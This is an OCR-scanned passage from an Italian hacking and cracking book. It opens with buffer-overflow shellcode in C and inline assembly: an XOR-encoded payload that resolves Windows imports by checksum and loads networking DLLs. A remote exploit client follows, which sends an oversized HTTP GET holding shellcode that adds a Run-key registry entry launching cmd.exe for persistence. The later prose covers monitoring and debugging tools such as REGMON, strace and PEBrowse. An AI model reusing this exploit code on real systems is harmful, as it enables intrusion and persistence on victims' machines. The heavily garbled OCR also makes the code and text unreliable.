[ebp 


+ 


86] 



//////////////////////////////////////////////////////////////////// 

// our data segment for the payload 
// format : 
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// a. DLL nane \0 

// b. function name \0 function name \0 ... etc etc \0\0 

// (doublé nuli terminatesi 

// c. Next DLL name \0 

// d. function name \0 function name \0 ... etc etc \0\0 

// (doublé nuli terminatesi 

// (Continue in this pattern until done) 

// e. \0 (Nuli DLL Name terminates loading cycle) 

// f. any additional data \0 data \0 data. . . \0\0 (dbl NULI 

terminated) 

'//////////////////////////////////////////////////////////////// 
data[] = "kernel32.dll\0" \ 

ZlobalAlloc \ OWriteFile \ OSleep \ OReadFile \ OPeekNamedPipe \0" \ 
"CreateProcessA \ OGetStartupInfoA \ OCreatePipe \0\0" \ 
"wininet.dll\0" \ 
zion list follows DLL name 

" InternetOpenA \ OlnternetCloseHandle \0" \ 
Le nuli terminates function list 

" InternetOpenUrlA \ OInternetReadFile \0\0" \ 
"ws2_32.dll \0" \ 
"WSAStartup\Osocket\Obind\Oconnect\Osend\Oselect\Orecv\0\0" \ 
// NULL DLL name ends loading cycle 
"\0" \ 

// extra data follows, doublé NULL terminates 
"http://10.0.0.5\0\0"; 

void test_me ( char *, int ) ; 
void build_rvas () ; 

char 

// > Fusion Technique <- 

// compile only assembly - can build other x86 platforms (just ne 
debug easily) 

// make sure ali functions are static 
#pragma check_stack ( off ) 

///////////////////////////////////////////////////////////////// 
tatic declspec (naked) void before_all (void) 

// this function is called first when the payload strikes 
// buzz forward and try to find canary value 

asm 

{ 

////////////////////////////////////////////////////////////////////, 
/ the payload must be decoded at this point . If we were using an 
encoded payload, we would insert the decoder code here 
// note: the EB 00 00 00 00 (short cali +0) which you see below 
// (getting bearings) is not possible if NULL characters are 
// disallowed, so the decoding loop cannot use this trick (errgl 
// there must be a better way! (stili doing research) 
//////////////////////////////////////////////////////////////////// 
int 3 // debugging only 

ìli RELOC 

pop edi // get our bearings (our current eip) 

mov ebp, esp 

sub esp, 3000 // get the stack out of the way 



lar *gPayload = NULL; 
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DATA_SECTION: 

////////////////////////////////// 
// loop until we get to the data 
// section, as marked by the 
// canary value 

////////////////////////////////// 
ine edi // our hearing point 

emp dword ptr [edi], -1 

jne GET_DATA_SECTION 
id edi, 4 // we made it, get past canary itself 

esi, ebp // output ptr 

TET_PRELOADED_FUNCTIONS : 

////////////////////////////////// 
// get pointers to preloaded 
// functions, based on checksum 
// of function name, uses 
// PE header's import table 
// -NULL DWORD terminates 
////////////////////////////////// 
mov eax, dword ptr [edi ] 

emp eax, 0 

je DONE_PRELOAD 

// build_rvas uses edi, so save value 
push edi 

mov edi, eax 



cali 
mov 



//////////////////////////////////////// 

// build_rvas returns the function 

// address assocaited with our checksum, 

// checksum passed in edi 

// returns function addr in edi 

//////////////////////////////////////// 

build_rvas 

dword ptr [esi], edi// get the function address 
pop edi 



add 
add 



esi, 4 
edi, 4 



jmp 



GET PRELOADED FUNCTIONS 



DONE_PRELOAD : 
int 3 
add edi, 



// get past NULL 



_DLL_FUNCTIONS : 

//////////////////////////////////////////// 
// Dynamically load new DLL's and functions 
//////////////////////////////////////////// 
int 3 

emp byte ptr [edi], 0 

je LOAD_DATA // doublé NULL means done 

lea eax, [edi]// load DLL name 

push eax 
cali LOAD_LIBRARY 
emp eax, 0 



ALL_DONE 



ot found error 
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c, eax 



handle 



ACTION: 
xor 
repne scas 
cmp 



ztions 

ecx, 10000 // max string length - whatever 



sax, eax 
byte ptr [edi] , 0 

FUNCTION_DONE //done loading functions 



push edx 

push edi 

push edx 

cali GET PROC ADDRESS 



//save DLL handle 



pop 

cmp 
je 

mov 
add 
jmp 

_DONE : 
ine 
jmp 



edx 

eax, 0 
ALL DONE 



/ / restore DLL handle 
//missing functions, barf 



dword ptr [esi ] , eax 
esi, 4 

NEXT_FUNCTION 



edi 

LOAD DLL FUNCTIONS 



// get past 
// next DLL 



LOAD DATA: 



/////////////////////////////////////////////////////// 

// build pointers to ali of our additional data 

// strings (make sure there is room present) 

/////////////////////////////////////////////////////// 

int 3 

xor eax, eax 

repne scas 



cmp 
je 

mov 
add 
jmp 



JONE: 



int 



byte ptr [edi], 0 
ALL_DONE //done loading data 

dword ptr [esi], edi //save ptr to data item 
esi, 4 
LOAD DATA 



// debug break - we are done 



//////////////////////////////////////////////// 
// downloads a file from anywhere on internet 
// and executes it locally (not implemented 
// in this payload) 

//////////////////////////////////////////////// 
static declspec (naked) void exec_remote_file () 



m 



asm 



ret 
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static declspec (naked) void _WSASTARTUP ( ) 



asm 



sub 

push 

push 

cali 

add 

or 



esp, 8 

esp 
010 Ih 

WSASTARTUP 
esp, 8 
eax, eax 



ret 



//////////////////////////////////////////////// 
// lookup functlon ptr based on checksum 
// - argument (checksum) passed In edi 
// - returns function ptr in edi 

'/////////////////////////////////////////////// 
zatic declspec (naked) void build_rvas() 



_asm 

push 
push 
push 
push 
push 



eax 
ebx 
e ex 
edx 
esi 



ebx, 0x0040003C 

ecx, [ ebx ] 

ecx, 0x00400004 



lea eax, [ecx + 0x14] // 
mov esi, [eax + 68h] // 
esi, 0x00400000 




// start of PE header in memory 

// beginning of COFF header, fili in 

optional header offset 
offset to . idata data directory 

// make a real address (offset + base) 



DLL: 



// esi holds data directory offset - the 'DIRECTORY' 



mov 
emp 

je 
add 
mov 
add 



eax, [esi ] 
eax, 0 

DONE_LOADING 
eax, 0x00400000 
edx, [esi + 16] 
edx, 0x00400000 



FUNCTION: 

mov ebx, [eax ] 
' HINT ' ) 

mov ecx, ebx 

ecx, 0x80000000 

ecx, 0 

ine SKIP ORDINAL 



and 
emp 
ie 



// RVA of Import Lookup Table - the 'L001 
// zero means end of table 

// make real address 
// RVA of ' THUNK ' table 
// make real address 



// 'LOOKUP' 32 bit value ('RVA of 



// check flags for ordinai/ ascii 



// we are here if this table has ascii names 

// RVA of 'HINT' - make real address 



add ebx, 0x00400000 
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// functlon lookup by checksum 



xor 
FI: 



xor 
rol 
ine 
emp 
jne 



x, 2 
ecx, ecx 

ci, byte ptr [ebx] 
ecx, 8 
ebx 

byte ptr [ebx], 0 
FI 



// skip first 



emp ecx, edi 
jne _F3 
mov edi, [edx] 
//int 3 

jmp DONE_LOADING 



// compare destination checksum 



// we are here if we match 



edx, 4 
eax, 4 
[eax ] , 0 
NEXT_FUNCTION 



//more functions 



// next entry in ' THUNK ' table 
// next entry in import table 
// zero means end of table 
// drop thru to next DLL if we have ne 



CIP_ORDINAL : 
id esi, 20 

?v edx, [eax] 

emp edx, 0 

//goto next DLL 
le NEXT_DLL 



// 20 bytes to next entry in table 

// pointing to 'LOOKUP' 

// zero means end of 'LOOKUP ' table - 



3NE_L0ADING : 

pop esi 

pop edx 

pop ecx 

pop ebx 

pop eax 

ret 



isekeeping bookmark so we can calculate code size 
declspec (naked) static void after_all() 



ret 



// [ END PAYLOAD ] 

//////////////////////////////////////////////////////////////////// 
#pragma check_stack 

//////////////////////////////////////////////////// 
// the following functions are used by our locai program to 
'/ set up the payload and such - they are not part of 
'/ our actual payload code. 

//////////////////////////////////////////////////// 
D GetChecksum( char *p ) 



i 
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DWORD aChecksum 
asm 



= 0; 



eax, eax 
esi, p 

al, byte ptr [esi] 
eax, 8 
esi 

byte ptr [esi ] , 0 
ALOOP 

dword ptr [aChecksum] , eax 



n aChecksum; 

zility function » 
void encode_payload ( char *thePa} 

'< 

while (theLen — ; 

* (thePayload++) A = theEncodeBy 




ftdefine number_of_import_functions 3 
BOOL fDebug = FALSE; 

int 



{ 



_cdecl main(int argc, char* argv[]) 
printf("The Payload is Corning! \n") ; 

///////////////////////////////////////////////////// 
// Check for debug mode. If it is set, we will 
// overflow ourselves as a test . 

///////////////////////////////////////////////////// 
if(argc > 1 && argv[l] [0] == 

switch (argv[l ] [1] ) 
{ 

case ' d ' : 
case ' D ' : 

// debug mode 
fDebug = TRUE; 
break; 
} 

} 

/////////////////////////////////////////////////////////// 
// calculate code segment length by subtracting the 
// difference of two function addresses . 

// 

// these funnctions have been compiled locally into our 
// code segment 

// 

/////////////////////////////////////////////////////////// 
void *code_segment = (void *) before_all; 
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void *after_code_segment = (void *) after_all; 
unslgned long code_len = (long) after_code_segment - 
(long) code_segment ; 

/////////////////////////////////////////////////////////// 

// add a data segment to the end of our buffer 

// 

/////////////////////////////////////////////////////////// 
char *data_segment ; 

unslgned long data_len = (sizeof (DWORD) * 
(number_of_import_functions + 1) ) + 100; 

/////////////////////////////////////////////////////////// 
// the actual code is copled front code segment and into 
// our new buffer here 

// 

/////////////////////////////////////////////////////////// 
char *aPayload = new char [code_len + data_len] ; 
char *aCursor = aPayload; 

/////////////////////////////////////////////////////////// 
// header for getting bearings w/o using a NULL character 
// translates to: 

// YEP: pop ebp 

// jmp OVER 

// cali YEP 

// OVER: /decoder goes here 

'////////////////////////////////////////////////////// 



lar bearing_code [ ] = "\x5D\xEB\x05\xE8\xF8\xFF\xFF\xFF" ; 
Bmcpy (aCursor, bearing_code, strlen (bearing_code) ) ; 
ìCursor += strlen (bearing_code) ; 

///////////////////////////////////////////////////////////////// 
// now the code to XOR decode everythlng 
// translates to: 

// mov eax, ebp 

// add eax, OFFSET (see offset below) 

///////////////////////////////////////////////////////////////// 



char xor_decodel [] = "\x8B\xC5\x83\xC0"; 

igned char aOffset = 17; // determined thru calculation of 

oerand sizes, offset should land us dlrectly beyond the decoder // 



oy (aCursor, xor_decodel , strlen (xor_decodel) ) ; 
Zursor += strlen (xor_decodel) ; 

memcpy (aCursor, (char *) SaOffset, sizeof (unslgned char)); //OB 
ìCursor += sizeof (uns igned char); 

////////////////////////////////////////////////////////////// 
// xor ecx, ecx 

// mov ex, SIZE 

/////////////////////////////////////////////////////////////// 
char xor_decode2[] = "\x33\xC9\x66\xB9"; 
unslgned short aSize = code_len + data_len; 

memcpy (aCursor, xor_decode2 , strlen (xor_decode2) ) ; 
aCursor += strlen (xor_decode2 ) ; 
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memcpy (aCursor, (char *) SaSize, slzeof (unslgned short)); //OF. 

I aCursor += slzeof (unslgned short); 
///////////////////////////////////////////////////////////////// 
// LOOP A: xor [eax] , OxAA 

// ine eax 

// loop LOOPA 

// this completes the decoding header - everything else is 
// fusion ! 

/////////////////////////////////////////////////////////////// 
char xor_decode3 [ ] = "\x80\x30\xAA\x40\xE2\xFA"; 

men 
aCi 

/////////////////////////////////////////////////////////////// 
// then the rest of the payload code (which is xor protected) 

/////////////////////////////////////////////////////////////// 
memcpy (aCursor, code_segment , code_len) ; 



memcpy (aCursor, xor_decode3 , strlen (xor_decode 3) ) ; 
aCursor += strlen (xor_decode3) ; 



/////////////////////////////////////////////////////////// 
// this block copies the payloads "data segment " into our 
// new buffer 

/////////////////////////////////////////////////////////// 



// ptr to data portion 
char *curr = aCursor + code_len; 

/////////////////////////////////////////////////////////// 
// GetChecksum calculates a checksum of a string. This 
// checksum is 4 bytes long. It will be recognized by our 
// payload when loading functions from the import table 
// of the target process. 
// 

// NOTE: casting of DWORD type results in increments of 4 
// bytes in ptr arithmetic . 

/////////////////////////////////////////////////////////// 

*( (DWORD *)curr+0) = OxFFFFFFFF; //canary value 

*( (DWORD *)curr+l) = GetChecksum ( "GetProcAddress" ) ; 

*( (DWORD *)curr+2) = GetChecksum ( "LoadLibraryA" ) ; 

'ORD *)curr+3) = NULL; // 

mcpy (( (DWORD *)curr+4), (char *)data, 100); 




///////////////////////////////////////////////////////////////// 
V encode our payload for delivery (remove NULL characters) 

// 'AA ' is hardcoded in decoder above, so encode with it here 
// too. 

/////////////////////////////////////////////////////////////// 
encode_payload ( aCursor, code_len + data_len, ' \xAA' ) ; 



// overflow ourselves as a test 
//if(fDebug) 



{ 



int call_offset = 3; // where to start eip from 
test_me (aPayload, call_offset) ; 
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ifdgetchar (), 

// Only a compiler trick - we need the compiler to think these 
// functions are used. This really doesn 't get run, but 
// functions are never instantiated in the code segment 
// unless the compiler thinks they get called at least once 
before_all () ; 
after_all () ; 



return 0; 



// for testing the payload on the stack (no injection vector) 
oid test_me (char *input _ptr, int call_offset) 



7 



char too_small [1000] ; 

char *i = too_small; 

memcpy (too_small, input_ptr, 1000); 

i += call_offset; 



// just cali the first address (just payload was inserted, no 
// injection vector. 
asm mov eax, i 



La ricerca dei buffer overflow è di fatto una delle attività più eccitanti ce l'hacker può condurre. 
La tipologia delle macchine e dei sistemi operativi amplia le possibilità legate alla tipologia di 
buffer overflow che possono essere creati. 

Come dicevamo prima il PE, ovvero la testata di un file eseguibile in ambiente Windows, 
contiene diverse informazioni tra le quali alcune relative alle funzioni importate. 
Queste che seguono sono di fatto alcune funzioni di quelle specificate: 



Registry 
Manipulation 


Window and GUI 
Manipulation 


Memory and Exception 
Handling 


File and Shared Memory 
Manipulation 


RegQueryVal ueExA 


PostMessageA 


HeapAlloc 


OpenMutexA 


RegCloseKey 


SetWindowPlacement 


SetConsoleCtrlHandler 


OpenFi 1 eMappingA 


RegOpenKeyExA 


EndDialog 


Unhandl edExcept i onFi Iter 


FindFirstFileA 


RegOpenKeyA 


DialogBoxParamA 


HeapReAlloc 


SearchPathA 


RegSetVal ueExA 


DestroyWindow 


HeapDestroy 


ReadFile 


RegEnumValueA 


GetWindowPlacement 


HeapCreate 


WriteFile 




CreateWindowExA 


VirtualFree 






RegisterClassExA 


VirtualAlloc 






GetMessageA 


SetUnhandledExceptionFilte 
r 






UpdateWindow 


TlsFree 






ShowWindow 


TerminateProcess 






PostQuitMessage 


GetCurrentProcess 








GetModuleHandleA 
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Altre funzioni invece sono già lette all'interno del process space di Windows per cui utilizzarle 
significa semplicemente individuare dove queste siano posizionate in memoria. 
Utilizzando dei debugger diventa semplice individuarle come ad esempio mediante WDASM. 
Prendiamo ad esempio le funzioni per la manipolazione delle voci del registro. 



ADVAPI32 . RegCloseKey 
ADVAPI32 . RegCreateKeyExA 
1VAPI32 . RegOpenKeyExA 



Jump Table: Actual (NTServer 4.0 SI 
[43D004] 77DB75A9 
[43D008] 77DBA7F9 
[43D00C] 77DB851A 



Il seguente codice mostra come utilizzare le funzioni già presenti all'interno del process 
space. 



^include "Windows . h" 
^include "stdio.h" 
^include "winsock . h" 

tdefine TARGET_PORT 224 

TARGET_IP "127.0.0.1" 



3ndBuffer[] = 

"GET /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA " 
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA " 
"AAAAAAAAAAABBBBAAAACCCCAAAAAAAAAAAAAAAAAAAAAAAAAAA " 
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 
"AAAAAAAAAAAAAAAAAAAAAAAAAAADDDDAAAAEEEEAAAAAAAAAAA " 
//mov eax, 0xl2ED21FF 
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//rol eax, 0x018 

//mov ebx, eax 

" \xB8\xFF\xlF\xED\xl2\x2C\xFF\xCl \: 
// xor ecx, ecx 

// mov ecx, 0x46 

//LOOP_TOP: 

// dee eax 

// xor [eax], 0x80 

// dee ecx 

// jnz LOOP_TOP (75 F9) 

" \x33 \xC9 \xBl \x46\x48\x80 \x30 \x80 \x49\x75 \xF9 " \ 

//push ebx 

"\x53" \ 

//mov eax, 77787748 

//mov edx, 77777777 

"\xB8\x48\x77\x78\x77" \ 
"\xBA\x77\x77\x77\x77" \ 

//xor eax, edx 
//push eax 
"\x33\xC2\x50" \ 

//xor eax, eax 
//push eax 
"\x33\xC0\x50" \ 

// mov eax, 0x77659BAe 
// xor eax, edx 
// push eax 

" \xB8 \xAE\x9B \x65 \x77\x33 \xC2 \x. 

//mov eax, F7777775 
//xor eax, edx 
//push eax 

"\xB8\x75\x77\x77\xF7" \ 
"\x33\xC2\x50" \ 

//mov eax, 7734A77Bh 
//xor eax, edx 
//cali [eax ] 
"\xB8\x7B\xA7\x34\x77" \ 
"\x33\xC2" \ 
"\xFF\xlO" \ 

//mov 
//mov 
//xor 
//sub 
//push 
//push 
//push 
//xor 
//push 
//push 
//push 
//mov 
//xor 
'/cali 
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"\x8B\xFB" \ 

"\xBA\x77\x77\x77\x77" \ 
" \xB8 \x63 \x9A \x65 \x77\x33 \xC2 " \ 
"\x2B\xD8\x53\x50" \ 
"\x6A\x01\x33\xC9\x51" \ 
"\xB8\x70\x9A\x65\x77" \ 
"\x33\xC2\x50" \ 
"\xFF\x37\xB8\x77\xA7\x34" \ 
"\x77\x33\xC2\xFF\xlO" \ 

// halt or jump to somewhere harmless 
"\xCC" \ 

"AAAAAAAAAAAAAAA " \ 

// nop (int 3) 92 
// nop (int 3) 
// jmp 

" \x90 \x90 \xEB \x80 \xEB \xD9 \xF9 \x77" \ 
/* registry key path 
, \SOFTWARE\ \Microsoft \ \Windows \ \CurrentVersion \ \Run " */ 

" \ xDC \ xD3 \ xCF \xC6\xD4\xD7\ xCl \ xD2 \ xC5 \ xDC \ xCD \xE9\ xE3 \ xF2 " 

" \ xEF \ xF3 \ xEF \xE6\ xF4 \xDC\xD7\xE9\ xEE \xE4\ xEF \xF7\ xF3 \xDC\ xC3 " \ 
" \ xF5 \ xF2 \ xF2 \ xE5 \ xEE \ xF4 \xD6\ xE5 \ xF2 \ xF3 \xE9\ xEF \ xEE \ xDC 
"\xD2\xF5\xEE\x80" \ 
/* value name "_UR_HAXORED_" */ 

" \xDF\xD5 \xD2 \xDF\xC8 \xCl \xD8 \xCF\xD2 \xC5 \xC4 \xDF\x80 " \ 
/* the command "cmd.exe /c" */ 

SD \xE4 \xAE\xE5 \xF8 \xE5 \xAO \xAF\xE3 \x80 \x80 \x80 \x80 \x80 "; 

nain(int argo, char* argv[]) 

WS AD ATA wsaData; 
SOCKET s; 

SOCKADDR_ IN sockaddr; 

sockaddr . sin_family = AF_INET; 
if (3 == argc) 



int port = atoi (argv[2] ) ; 
sockaddr . sin_port = htons (port) ; 

else 

sockaddr . sin_port = htons (TARGET_PORT) ; 
f (2 <= argc) 

sockaddr . sin_addr . S_un . S_addr = inet_addr (argv [2] ) ; 

else 

sockaddr . sin_addr . S_un . S_addr = inet_addr (TARGET_1 



try 



WSASt artup (MAKEWORD (2,0) , & wsaDa ta) ; 
S = SOCket (AF_INET, SOCK_ S TREAM, IPPROTO_TCP) ; 
if(INVALID_SOCKET == s) 
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Strumenti collaterali 

Come abbiamo visto in altri capitoli esistono alcune tecniche e metodologie che sono comuni 
tra quelle dell'hacker e quelle del cracker ed in particolar modo gli strumenti che spesso 
devono esser utilizzati. 
A che cosa mi riferisco in particolar modo ? 

Chiaramente quando si è parlato di tecniche legate ai buffers overflow ci siamo riferiti ai 
debugger e ai disassemblatori ma a questo punto dobbiamo ampliare la famiglia guardando 
una serie di Utilities che servono ad analizzare i mutamenti legati al sistema operativo a livello 
di diversi aspetti come ad esempio registro, files e cosi via. 
Su di un sistema chiamato 



sono disponibili gratuitamente una serie di Utilities come ad esempio REGMON, FILEMON, 
DISKMON ecc. i quali permettono di spiare in tempo reale tutte le chiamate di sistema 
indirizzate ad eseguire funzioni su questi oggetti. 

Come ben saprete, ad esempio a livello di registro, esistono delle funzioni particolari che 
permettono di leggere, scrivere e cercare delle voci all'interno del registro stesso come ad 
esempio : 

ADVAPI32 . RegCloseKey 
ADVAPI32 . RegCreateKeyEx 
ADVAPI32 . RegOpenKeyEx 
ADVAPI32 . RegQueryValueEx 

Nell'ambito delle protezioni questi strumenti vengono usati per individuare le modifiche e le 
voci utilizzate all'interno del registro ed eventualmente i files in cui vengono scritte e lette 
certe informazioni. 
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HI ^ i J & V 



C3 



rtì 
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1 Piocsss | Regnasi | Fatti 



Result 



Other 



4793 72.974E4511 

430(1 7237583974 

H 7237S999J7 

4303 72976144-H6 
4603 729762243B 

4304 7237S31795 
430G 7297306321 

4306 7297392945 

4307 7297301 91 3 
4303 72979131 7Z 

4309 72373251 23 

4310 7297332:336 

4311 7237341633 



1 



svchùsàcat.. DùseKcj HKUv1V5v^^CijirKrEmliuEel\5±iwci=iVT. .. SUCCESS 

FvchostBHe... OpenKEH HKUi1\E^aBm\CuirerlCDriliiolSa(\SeiviisE\T... NOTFOUHD 

ncW eie.. OpcrKcv HKLlvlVSj,rfcm\Cuii=r*CDnlinÉd\S=iwcEi?J . NOTFOUWD 

FvchostEsra.. OpenKEj HKUi1\E.^E*Hn\CuirenH;cfiliiolSa(\Seivic8E\T... SUCCESS 

mchnst eie . QuHjjVabe HKLMVS^rf^CuiiEr^OTlinEsl'iSEivicEsM _ SUCCESS 

svchostEae... Clo8eK.BU HKUv|\E.^!*Hn\aiirertCcfilrolSat\SeiMC8EU... SUCCESS 

mchnit eie .. Opcr*^ HKLMVSrflni^FbiciciVHiCTCorflVSjjsfeniV .. SUCCESS 

pjchostBie... QuHjIValuE HKLM\B.cflvHifB\PoSiaB3\MicrD!cfl\Bji8tìn\... NOTFOUHD 

ivchojt&e... ClowKey HKLM\Eoflhae\PoicÌK\Hiaosofl\Eji5tem^... SUCCESS 

svcJicut ese ... CrwtcKjejj HKLIv1\5^!t^Cuireri|CDniiior5cr.5ei | /icesVT . SUCCESS 

svchostHie... QuayValje HKm\Ej|sti^ftjMertCctiliolSet\SeMcsiVr... SUCCESS 

svcJicut ene . QucciVaUe HKLM\S^aari^Cuireri|CDniiiorScr.5ei | /icesV.T... SUCCESS 

ivchostHie... CloseKe}. HKm\Ej|sti^ftjMertCctiliolSet\SeMcsiVr... SUCCESS 



K^:DkE?7EF4E[ 



Kja^:0i£27EF4EC 
"hnniE" 

Kgy:0r£27EMEC 
K=^0h£27EF4EC 

Kjej|.0£27EF4EC 
Kkw:0i£27EF4E| 



Kflj>:0£27EF4EdB 




Il programma di capture del registro permette di settare dei filtri in modo tale da vedere solo le 
operazioni fatte sul registro da singoli programmi. 

Chiaramente viene anche visualizzato il tipo di operazione, la chiave interessata, il valore e il 
risultato. 

La stessa possibilità la possiede anche il programma per monitorare l'accesso ai files e al 
disco. 

Sempre degli stesso autori vengono distribuiti diversi programmi della classe di REGMON e 
precisamente FILEMON, DISKMON. 

Un alra utilità è STRACE che permette di tracciare le cali che vengono eseguite al sistema. 
Nell'ambito del cracking questa funzionalità è importantissima in quanto spesso si presenta la 
necessità d individuare le chiamate che vengono fatte al sistema. 
L'attivazione del programma viene eseguita mediante la linea d comando : 

[c:\strace] strace notepad 

1' output sarà 

1 133 139 NtOpenKey (0x80000000, {24, 0, 0x40, 0, 0, 

" \Registry\Machine\Software \Microsoft \Windows NT\CurrentVersion\Image 
File Execution Optlons\notepad.exe"}, ... ) == 
STATUS_OBJECT_NAME_NOT_FOUND 

2 133 139 NtCreateEvent (0x100003, 0x0, 1, 0, . . . 8, ) == OxO 

3 133 139 NtAllocateVirtualMemory (-1, 1243984, 0, 1244028, 8192, 4, 
... ; == OxO 

4 133 139 NtAllocateVirtualMemory (-1, 1243980, 0, 1244032, 4096, 4, 
... ; == OxO 

5 133 139 NtAllocateVirtualMemory (-1, 1243584, 0, 1243644, 4096, 4, 
... ; == OxO 

6 133 139 NtOpenDirectoryObject (0x3, {24, 0, 0x40, 0, 0, 
"\KnownDlls"}, ... 12, ) == OxO 

7 133 139 NtOpenSymbolicLinkObject (Oxl, {24, 12, 0x40, 0, 0, 
"KnownDllPath" } , ... 16, ) == OxO 

8 133 139 NtQuerySymbolicLinkObject (16, ... "C:\WINNT\system32", 
0x0, ) == 0x0 

9 133 139 NtClose (16, ... ; == 0x0 



Come avrete notato l'attivazione è stata fatta specificando sulla linea di comando de 
programma da analizzare. 

Se si disponesse di un processo già attivo in memoria si potrebbe fare : 



[c:\strace] strace -p 34 
1 34 33 NtUserPeekMessage (1244212, 0, 0, 0, 1, 1244192, 



) == Oxl 
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2 34 

3 34 

4 34 
0x0 

5 34 

6 34 

7 34 



33 NtUserLockWindowStation (68, ... ; == Oxl 

33 NtUserOpenlnputDesktop (0, 0, 33554432, ... ; == 0xd8 

33 NtUserGetObjsctlnformation (216, 2, 0, 0, 1244100, . . . 



. . . 244, ) == 0x0 
1, -203229988, 512, 



33 NtUserGetObject Information (216, 2, 1294320, 16, 1244100, 
Oxl 

33 NtUserSwitchDesktop (84, . . . 
33 NtOpenKey (0x20019, (24, 0, 0x40, 0, 0, 
" \Registry\Machine \Hardware \DeviceMap\Video "} , 

8 34 33 NtQueryValueKey (244, " \Device\VideoO" , 
203229476, ... ; == 0x0 

9 34 33 NtOpenKey (0x20019, {24, 0, 0x40, 0, 0, 

" \Registry\Machine\System\CurrentControlSet \Hardware 
Profiles\Current \System\CurrentControlSet \Services \mga64 \DeviceO "} , 
. . . 184, ) == 0x0 

10 34 33 NtClose (244, ... ; == 0x0 



In altre parole il numero del processo viene specificato al posto del nome del programma. 
Un'altra utilità di monitoraggio è NT Process Monitor mediante il quale è possibile monitorae 
le funzion eseguite dai processi, come ad esempio la creazione di thread o la loro 
cancellazione. 
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Sempre da www.sysinternals.com è possibile prelevare HANDLE.EXE che permette di 

visualizzare gli handles dei files. 

Si tratta di un utility DOS che utilizza la sua interfaccia. 

Il risultato è del tipo : 



Handle v2 . 01 
Copyright (C) 1997-2001 Mark Russinovich 
Sysinternals - www.sysinternals.com 



System pid: 8 NT AUTHORI TY\S YS TEM 

74: File D:\WINNT\CSC\00000001 
cO: File E:\pagefile.sys 



System Idle Process pid: 0 \<unable to open process> 



SMSS.EXE pid: 132 NT AUTHORITY\SYSTEM 
14: File D:\WINNT 
2c: File D:\WINNT\system32 



CSRSS.EXE pid: 160 NT AUTHORITY\ SYSTEM 
18: File D:\WINNT\system32 
40: Section \NLS\NlsSectionUnicode 
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44: Section 

48: Section 

4c: Section 

50: Section 

4cc: File 



\NLS\NlsSectlonLocale 
\NLS\NlsSectlonCType 
\NLS\NlsSectionSortkey 
\NLS\NlsSectionSortTbls 
D : \ WINNT \ sys tem32\ega . cpl 



WINLOGON.EXE pld: 156 NT AUTHORITY\SYSTEM 

7c: File D:\WINNT\system32\Com 

168: Section \BaseNamedObjects\mmGlobalPnpInfo 

170: File D:\Program Files\Common Files\Microsoft Shared\web 
server extensions\40\_vti_bin 

18c: Section \BaseNamedObjects\WDMAUD_Device_Interface_Path 

198: Section \BaseNamedObjects\WDMAUD_Callbacks 

lbO: File D:\WINNT\system32\dllcache 



Un altra utility che sever a monitorare i device installati ne sistema è DRIVER MONITOR. 
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Quando si parla di attacchi locali, quelli che vengono eseguiti sulla machina stessa che si 
desidera colpire, spesso sono necessari molti strumenti di questo tipo per eseguire un analisi 
dettagliata su quello che accade sul sistema al momento dell'attivazione di qualche 
programma. 

Una di queste metodologie è quella che viene chiamata DIFFING. 

Molti che arrivano dal cracking dei giochi conoscono quei tipi di programmi che analizzano la 
memoria creando delle immagini che successivamente vengono usate per ricercare in quali 
locazioni sono avvenuti certi cambiamenti. 

Parlo dei giochi in quanto il fatto di andare a cercare il punto in memoria dove vengono 
memorizzati i soldi posseduti, come in CAESAR III, o i punti necessari a ottenere qualche 
privilegio sono situazioni comuni eseguite dagli smanettoni di questi. 

Sinceramente ho usato anch'io con Caesar il metodo di andare a cercare il punto in cui il 

programma teneva memorizzati i soldi a disposizione per le costruzioni. 

Ad ogni modo uno degli strumenti fondamentali di questi tipi di attività sono senz'altro i 

debugger. 

Il mitico Softlce si sta perdendo per la strada in quanto essendo questo debugger legatissimo 

al basso livelo del sistema operativo, i nuovi come ad esempio XP non lo supportano. 

A parte il fatto che a volte gli strumenti semplici che si trovano all'interno di altri pacchetti 

sono funzionalmente meglio di molti altri il cui scopo di fatto è quello unico di debuggare. 

Mi sto riferendo ad una piacevole scoperta fatta ultimamente quando provando PEBrowse 

Pro mi sono accorto che al suo interno esisteva un debugger. 
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Quali caratteristiche fantastiche poteva avere questo debugger ? 

Nulla di particolare ma solo un metodo molto comodo di seguire il programma. 

Durante la fase di debugging spesso ci si trova davanti a cali a funzioni per cui in quel punto il 

programma interrompe la sequenzialità per saltare ad un altro indirizzo. 

Il debugger di cui sto parlando quando si verifica questo caso apre una nuova finestra in cui 

viene incorporata la funzone chiamata. 

In questo modo è semplice avere sotto gli occhi il flusso completo in quanto la visualizzazione 
può può avvenire passando da una finestra ad un'altra avendo sempre tutto sotto gli occhi. 
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Sempre all'interno di finestre indipendenti il debugger in questione permette di visualizzare 
informazioni particolari come ad esempio il contenuto dello stack, cosa importantissima nel 
tipo di usi che un hacker ne potrebbe fare. 

Alcune volte diventa importantissimo avere sotto gli occhi le informazioni legate ai thread, agli 

oggetti grafici in memoria, gli oggetti creati dall'utente, quelli del kernel. 

PE Browser Debugger visualizza anche delle finestre in cui è possibile visualizzare queste 

informazioni. 

Ripeto che comunque la funzionalità più importante è quella legata al fatto di visualizzare una 
nuova finestra ogni volta che viene incontrata una cali. 

Chi ha debuggato in asembler dei programmi potrà sicuramente capire quanto possa essere 
importante questa funzionalità. 

Le informazioni fornite da PEDebug coprono ad ogni modo tutti gli aspetti dei processi in 
memoria a partire dagli oggetti Kernel, quelli definiti dall'utente, gli oggetti grafici relativi alla 
GDI e cosi via. 

Sicuramente PEBrowse e PEDebug è diventato in questi anni uno degli strumenti migliori 
esistenti relativi a queste funzionalità. 
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; Process Information: | | [ 


x| 


Environment | Starti! p | Threads 


Kernel Objects | User Objects | GDI Objects 




0004-Section (0xE2B7FFD0) 
0008-Event (0x81584820) 
OOOC-Event (0x815C22E0) 

0010-Evenr. (0x81 6F7F60) 




■001 4 - Directory \KnownDlls (0x81 8A871 01 ■ 




0018-Event (0x8164B500) 

001 C - Directori) Windows (0x81 8A81 80) 

